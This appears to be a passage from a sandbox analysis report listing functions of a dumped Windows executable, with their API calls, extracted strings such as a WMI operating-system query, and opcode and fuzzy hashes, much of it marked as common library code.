                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                  • Instruction ID: c42cef1794c866ba8de2fbf72c4305eea336a0d2f6a720e33f1bed86fb0ce2a6
                                                                  • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                  • Instruction Fuzzy Hash: 1E8120713043455FDF24DE59C991BBE37D4ABD1308F00492FEA8687282EE6C9985875B
                                                                  Function 004751C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c3a5c7f1bc03812b70392c2531c53328fdd13f99ab9873e3fa79a4f9f1910e47
                                                                  • Instruction ID: f80192cd011010dd7441ab21911ba3de77176ce937c9334e437fcccae45cf447
                                                                  • Opcode Fuzzy Hash: c3a5c7f1bc03812b70392c2531c53328fdd13f99ab9873e3fa79a4f9f1910e47
                                                                  • Instruction Fuzzy Hash: D961AA31A00F0856EA349A6868957FF2394EB41344F14C95FE84EDF393D6DDEC428A4E
                                                                  Function 00474F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                  • Instruction ID: 6fe7a98edcf80f0aad8f49ef92293c3f85daeaedea4d3db8a8e9b6f95df21cc4
                                                                  • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                  • Instruction Fuzzy Hash: 45512460600F8857DB3456788556BFF23959B42305F58C81FE98EDF382C68DAE0683AE
                                                                  Function 0045EFE2 Relevance: .2, Instructions: 161COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 733deccb827c242de999ec270e6ae74952feee772e56c16d4c49c3139e971eae
                                                                  • Instruction ID: 0cfc55f76849aa7112ef136a9bad690f6445649e54893d8b242dd68e1d0341b0
                                                                  • Opcode Fuzzy Hash: 733deccb827c242de999ec270e6ae74952feee772e56c16d4c49c3139e971eae
                                                                  • Instruction Fuzzy Hash: 2451F4315093D58FD702DF35C14046EBFE0AE9A719F4909AEE8D95B243C224DA4ECB67
                                                                  Function 004600B7 Relevance: .1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4aa8cfbe09885d12bdc6a97d2ab5e9d7b621243a521c157524d54d1957109653
                                                                  • Instruction ID: 270ffe74f10d21e13513a0688f14b859bc49d02343fdcad84926fcc51baa42dc
                                                                  • Opcode Fuzzy Hash: 4aa8cfbe09885d12bdc6a97d2ab5e9d7b621243a521c157524d54d1957109653
                                                                  • Instruction Fuzzy Hash: F551DFB1A087119FC748CF29D48055AF7E1FF88314F058A2EE899E3340D735EA59CB9A
                                                                  Function 00463E0B Relevance: .1, Instructions: 112COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                  • Instruction ID: a54280d15d8133fc69b7938a9a6163955b0bc143aef1b0414f87bce942986f8c
                                                                  • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                  • Instruction Fuzzy Hash: 1F312C71A147468FCB18DF15C85116EBBE0FB95305F104A2EE4C5C7342D739EA1ACB96
                                                                  Function 0045E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _swprintf.LIBCMT ref: 0045E30E
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                    • Part of subcall function 00461DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00491030,00000200,0045D928,00000000,?,00000050,00491030), ref: 00461DC4
                                                                  • _strlen.LIBCMT ref: 0045E32F
                                                                  • SetDlgItemTextW.USER32(?,0048E274,?), ref: 0045E38F
                                                                  • GetWindowRect.USER32(?,?), ref: 0045E3C9
                                                                  • GetClientRect.USER32(?,?), ref: 0045E3D5
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0045E475
                                                                  • GetWindowRect.USER32(?,?), ref: 0045E4A2
                                                                  • SetWindowTextW.USER32(?,?), ref: 0045E4DB
                                                                  • GetSystemMetrics.USER32(00000008), ref: 0045E4E3
                                                                  • GetWindow.USER32(?,00000005), ref: 0045E4EE
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0045E51B
                                                                  • GetWindow.USER32(00000000,00000002), ref: 0045E58D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                  • String ID: $%s:$CAPTION$d$tH
                                                                  • API String ID: 2407758923-3054491469
                                                                  • Opcode ID: 3e0dd7e57c7a6da6f92882fa1a450a133258462e4553e6f553767ec8b07b964d
                                                                  • Instruction ID: 27f67eb4d2f03411dc33bdc4038e6f3546ac7297ff9430a42394df11c0bffca6
                                                                  • Opcode Fuzzy Hash: 3e0dd7e57c7a6da6f92882fa1a450a133258462e4553e6f553767ec8b07b964d
                                                                  • Instruction Fuzzy Hash: 3981B171108301AFD714DFA9CD88A6FBBEDEB89705F04092EFA84D7251D734E9098B56
                                                                  Function 0047CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___free_lconv_mon.LIBCMT ref: 0047CB66
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C71E
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C730
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C742
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C754
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C766
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C778
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C78A
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C79C
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C7AE
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C7C0
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C7D2
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C7E4
                                                                    • Part of subcall function 0047C701: _free.LIBCMT ref: 0047C7F6
                                                                  • _free.LIBCMT ref: 0047CB5B
                                                                    • Part of subcall function 00478DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34), ref: 00478DE2
                                                                    • Part of subcall function 00478DCC: GetLastError.KERNEL32(00483A34,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34,00483A34), ref: 00478DF4
                                                                  • _free.LIBCMT ref: 0047CB7D
                                                                  • _free.LIBCMT ref: 0047CB92
                                                                  • _free.LIBCMT ref: 0047CB9D
                                                                  • _free.LIBCMT ref: 0047CBBF
                                                                  • _free.LIBCMT ref: 0047CBD2
                                                                  • _free.LIBCMT ref: 0047CBE0
                                                                  • _free.LIBCMT ref: 0047CBEB
                                                                  • _free.LIBCMT ref: 0047CC23
                                                                  • _free.LIBCMT ref: 0047CC2A
                                                                  • _free.LIBCMT ref: 0047CC47
                                                                  • _free.LIBCMT ref: 0047CC5F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                  • String ID: hH
                                                                  • API String ID: 161543041-101857925
                                                                  • Opcode ID: f2c8d692c088491f54a6b4ce72c1e50cb711a879b2b7238ec6e080c4ae4feb65
                                                                  • Instruction ID: 6bb45df054ee4357b5f03d23ba3c797f61a9f35f0cf66e6ad0a6aa585533deae
                                                                  • Opcode Fuzzy Hash: f2c8d692c088491f54a6b4ce72c1e50cb711a879b2b7238ec6e080c4ae4feb65
                                                                  • Instruction Fuzzy Hash: F2311D315002059FEB31AA39E885B9B77E5AF20324F14D41FF55CD6291DF39E844CB58
                                                                  Function 004796F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00479705
                                                                    • Part of subcall function 00478DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34), ref: 00478DE2
                                                                    • Part of subcall function 00478DCC: GetLastError.KERNEL32(00483A34,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34,00483A34), ref: 00478DF4
                                                                  • _free.LIBCMT ref: 00479711
                                                                  • _free.LIBCMT ref: 0047971C
                                                                  • _free.LIBCMT ref: 00479727
                                                                  • _free.LIBCMT ref: 00479732
                                                                  • _free.LIBCMT ref: 0047973D
                                                                  • _free.LIBCMT ref: 00479748
                                                                  • _free.LIBCMT ref: 00479753
                                                                  • _free.LIBCMT ref: 0047975E
                                                                  • _free.LIBCMT ref: 0047976C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID: 0dH
                                                                  • API String ID: 776569668-2730253187
                                                                  • Opcode ID: b492e13a4ed3a17b0bf9c438a8e430fd800573af9dcabaa963a1509bb3c0cb43
                                                                  • Instruction ID: 2a16b7d9ebbca01131138b50073f5e6d03c59eb2d770e72693b5718c3555e17e
                                                                  • Opcode Fuzzy Hash: b492e13a4ed3a17b0bf9c438a8e430fd800573af9dcabaa963a1509bb3c0cb43
                                                                  • Instruction Fuzzy Hash: 6D11E976140009BFCB11EF95C846CDD3B75EF24364B01A4AAFA0C4F262DE35DE549B88
                                                                  Function 00469711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00469736
                                                                  • _wcslen.LIBCMT ref: 004697D6
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004697E5
                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00469806
                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0046982D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                  • API String ID: 1777411235-4209811716
                                                                  • Opcode ID: 9581e626ffcebffaba2dea59d2d26c9873131429668b0bc4a0f8079003c41257
                                                                  • Instruction ID: 5e151ba24f1cde93937be8bc704d9146eab135c15256ab83f4672e0c842db9e1
                                                                  • Opcode Fuzzy Hash: 9581e626ffcebffaba2dea59d2d26c9873131429668b0bc4a0f8079003c41257
                                                                  • Instruction Fuzzy Hash: 533103321083027AD725AF259C06FAF779C9F82725F14451FF50596292FBBC9E0483AE
                                                                  Function 0046D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindow.USER32(?,00000005), ref: 0046D6C1
                                                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 0046D6ED
                                                                    • Part of subcall function 00461FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0045C116,00000000,.exe,?,?,00000800,?,?,?,00468E3C), ref: 00461FD1
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0046D709
                                                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0046D720
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0046D734
                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0046D75D
                                                                  • DeleteObject.GDI32(00000000), ref: 0046D764
                                                                  • GetWindow.USER32(00000000,00000002), ref: 0046D76D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                  • String ID: STATIC
                                                                  • API String ID: 3820355801-1882779555
                                                                  • Opcode ID: 57b13642faa82441873e1f96007a336983c9fc77304e78ebc69cefc7af8d056d
                                                                  • Instruction ID: 905fb50882cf167d5b0db5a7531a228afff69e3d7bce1d52f5ee40946541a9ef
                                                                  • Opcode Fuzzy Hash: 57b13642faa82441873e1f96007a336983c9fc77304e78ebc69cefc7af8d056d
                                                                  • Instruction Fuzzy Hash: 13112472E007107BE3207F769C4AFAF765CAF40706F004636FA42A2191FA688B0546BF
                                                                  Function 00472E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 322700389-393685449
                                                                  • Opcode ID: 052636c715f44e9486af31da1d7bbfbc19b2b4b2d015152e1643f80acf9d8aac
                                                                  • Instruction ID: e12ee636bd5401556fff929e6ecf2220e9446a0124b101ae5c7a8c0974939340
                                                                  • Opcode Fuzzy Hash: 052636c715f44e9486af31da1d7bbfbc19b2b4b2d015152e1643f80acf9d8aac
                                                                  • Instruction Fuzzy Hash: 3BB17631800209EFCF29DFA5C9819EFB7B5EF04315B54805BE8086B302C779EA11EB99
                                                                  Function 0045AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nF
                                                                  • API String ID: 3519838083-1812640087
                                                                  • Opcode ID: c92e64ec14f9de4601c59f99186007efac848fdf55587c60cab5349861065e5f
                                                                  • Instruction ID: 8ddd9fbbf4075a786843a2c7959497a59a25b8ee64579fef734631a35b79178a
                                                                  • Opcode Fuzzy Hash: c92e64ec14f9de4601c59f99186007efac848fdf55587c60cab5349861065e5f
                                                                  • Instruction Fuzzy Hash: EB71AF71A00219AFDB14DF65CC959AFB7B8FF48716B10066EE802A72A1CB34AD05CB64
                                                                  Function 00456FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00456FAA
                                                                  • _wcslen.LIBCMT ref: 00457013
                                                                  • _wcslen.LIBCMT ref: 00457084
                                                                    • Part of subcall function 00457A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00457AAB
                                                                    • Part of subcall function 00457A9C: GetLastError.KERNEL32 ref: 00457AF1
                                                                    • Part of subcall function 00457A9C: CloseHandle.KERNEL32(?), ref: 00457B00
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                  • API String ID: 3122303884-3508440684
                                                                  • Opcode ID: b4ebe9704a8fe0a6bfe53f04c033f1a423972d558e4257225f8e123df29b61e7
                                                                  • Instruction ID: ec1d31132cacbcc435e5404bb5d9391bc1016afc7a06c482fcdf07f5ff9b96da
                                                                  • Opcode Fuzzy Hash: b4ebe9704a8fe0a6bfe53f04c033f1a423972d558e4257225f8e123df29b61e7
                                                                  • Instruction Fuzzy Hash: 3741E6B1D087447AEB20EB71AC42FEF77685B04709F00446BFD45A7283D67CAA4C8729
                                                                  Function 0046B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
